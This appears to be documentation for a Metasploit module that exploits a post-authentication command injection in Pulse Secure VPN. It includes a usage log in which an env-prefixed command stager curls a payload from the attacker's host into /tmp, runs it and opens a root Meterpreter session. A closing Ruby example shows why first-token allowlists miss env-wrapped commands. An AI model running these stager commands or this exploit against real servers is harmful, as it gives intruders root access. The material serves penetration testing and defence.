## Introduction

This module exploits a post-auth command injection in the Pulse Secure VPN server to execute commands as root. The `env(1)` command is used to bypass application whitelisting and run arbitrary commands.

Please see the related module `auxiliary/gather/pulse_secure_file_disclosure` for a pre-auth file read that is able to obtain plaintext and hashed credentials, plus session IDs that may be used with this exploit. A valid administrator session ID is required, in lieu of an untested SSRF vector.

## Targets

```
Id  Name
--  ----
0   Unix In-Memory
1   Linux Dropper
```

## Options

**SID**

Set this to a valid administrator session ID. Typically retrieved using the `auxiliary/gather/pulse_secure_file_disclosure` module.

## Usage

```
msf exploit(linux/http/pulse_secure_cmd_exec) > set sid 676f5f892e8c4a6419f10564f9e9d857
sid => 676f5f892e8c4a6419f10564f9e9d857
msf exploit(linux/http/pulse_secure_cmd_exec) > run

[*] Started reverse TCP handler on 127.0.0.1:[redacted]
[+] Setting session cookie: DSID=676f5f892e8c4a6419f10564f9e9d857
[*] Obtaining CSRF token
[+] CSRF token: 6b0e020e1de8c68c043ea0e4f663b7a5
[*] Executing Linux Dropper target
[*] Using URL: https://0.0.0.0:[redacted]/HSEjp77
[*] Local IP: https://[redacted]:[redacted]/HSEjp77
[*] Generated command stager: ["curl -kso /tmp/qlUqDxCU https://[redacted]:[redacted]/HSEjp77", "chmod +x /tmp/qlUqDxCU", "/tmp/qlUqDxCU", "rm -f /tmp/qlUqDxCU"]
[*] Executing command: env /home/bin/curl -kso /tmp/qlUqDxCU https://[redacted]:[redacted]/HSEjp77
[*] Yeeting exploit at https://[redacted]/dana-admin/diag/diag.cgi
[*] Triggering payload at https://[redacted]/dana-na/auth/setcookie.cgi
[*] Client 127.0.0.1 (curl/7.19.7 (i686-redhat-linux-gnu) libcurl/7.19.7 OpenSSL/1.0.1h zlib/1.2.3 libidn/1.18) requested /HSEjp77
[*] Sending payload to 127.0.0.1 (curl/7.19.7 (i686-redhat-linux-gnu) libcurl/7.19.7 OpenSSL/1.0.1h zlib/1.2.3 libidn/1.18)
[+] Payload execution successful
[*] Command Stager progress -  63.96% done (71/111 bytes)
[*] Executing command: env chmod +x /tmp/qlUqDxCU
[*] Yeeting exploit at https://[redacted]/dana-admin/diag/diag.cgi
[*] Triggering payload at https://[redacted]/dana-na/auth/setcookie.cgi
[+] Payload execution successful
[*] Command Stager progress -  87.39% done (97/111 bytes)
[*] Executing command: env /tmp/qlUqDxCU
[*] Yeeting exploit at https://[redacted]/dana-admin/diag/diag.cgi
[*] Triggering payload at https://[redacted]/dana-na/auth/setcookie.cgi
[*] Meterpreter session 1 opened (127.0.0.1:[redacted] -> 127.0.0.1:53200) at 2019-11-12 02:05:40 -0600
[!] Payload execution may have failed
[*] Command Stager progress - 102.70% done (114/111 bytes)
[*] Executing command: env rm -f /tmp/qlUqDxCU
[*] Yeeting exploit at https://[redacted]/dana-admin/diag/diag.cgi
[*] Triggering payload at https://[redacted]/dana-na/auth/setcookie.cgi
[+] Payload execution successful
[*] Command Stager progress - 123.42% done (137/111 bytes)
[*] Server stopped.

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer     : [redacted]
OS           : (Linux 2.6.32-00486-gddd7e32-dirty)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >
```

Note that the `[!] Payload execution may have failed` warning after `env /tmp/qlUqDxCU` appears even though the Meterpreter session had already opened on the preceding line; the opened session is the authoritative signal that the dropper ran.
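The Introduction says `env(1)` is used to bypass application whitelisting, and every stager command in the log above is prefixed with `env`. The following is an added illustration, not code from this module or from Pulse Secure, of why that works against any allowlist that decides on the first token of a command line: `env` is itself a permitted program, but it executes whatever follows it. The allowlist contents (`env`, `ping`, `traceroute`) and the shape of the check are hypothetical; the page does not describe how the real server's whitelist is implemented. The hardened check peels off `env` wrappers the way `env` itself parses its arguments (options, `--`, `VAR=value` assignments, then the program) and allowlists the program that would actually run.

```ruby
# Added example: first-token allowlist vs. resolving what env(1) really executes.
# ALLOWED and the check shapes are hypothetical models, not Pulse Secure's code.
ALLOWED = %w[env ping traceroute].freeze

# Naive check: only looks at argv[0]. `env <anything>` passes because env is allowed.
def naive_allowed?(cmdline)
  argv = cmdline.split # note: no shell quoting handled; sufficient for this model
  ALLOWED.include?(File.basename(argv.first.to_s))
end

# Resolve the program env(1) would exec. GNU env consumes its own options
# (-u/-C/-S take a value, -- ends options), then any VAR=value assignments,
# and executes the next argument; nested `env env ...` is peeled repeatedly.
def effective_program(cmdline)
  argv = cmdline.split
  prog = argv.shift
  while prog && File.basename(prog) == 'env'
    opts_done = false
    until argv.empty?
      a = argv.first
      if !opts_done && a == '--'
        opts_done = true
        argv.shift
      elsif !opts_done && a.start_with?('-') && a != '-'
        argv.shift
        argv.shift if %w[-u -C -S].include?(a) # option with a value
      elsif a.include?('=')
        argv.shift # VAR=value assignment, not the program
      else
        break
      end
    end
    prog = argv.shift # nil here means a bare `env`, which only prints the environment
  end
  prog
end

# Hardened check: allowlist the program that will actually execute, and never
# allow an exec wrapper such as env to be that program.
def hardened_allowed?(cmdline)
  prog = effective_program(cmdline)
  return false if prog.nil?
  (ALLOWED - ['env']).include?(File.basename(prog))
end

if __FILE__ == $PROGRAM_NAME
  # Constructed input mirroring the first stager command in the log above.
  stager = 'env /home/bin/curl -kso /tmp/qlUqDxCU https://[redacted]:[redacted]/HSEjp77'
  puts "naive:    #{naive_allowed?(stager)}"      # true  (argv[0] is env)
  puts "hardened: #{hardened_allowed?(stager)}"   # false (really runs curl)
  puts "runs:     #{effective_program(stager)}"   # /home/bin/curl
end
```

A real fix would go further than basename matching: execute a fixed argv with `execve` against absolute paths rather than building a shell string, and treat every wrapper that executes its arguments (`env`, `nice`, `nohup`, `xargs`, shells and script interpreters) the same way as `env` here.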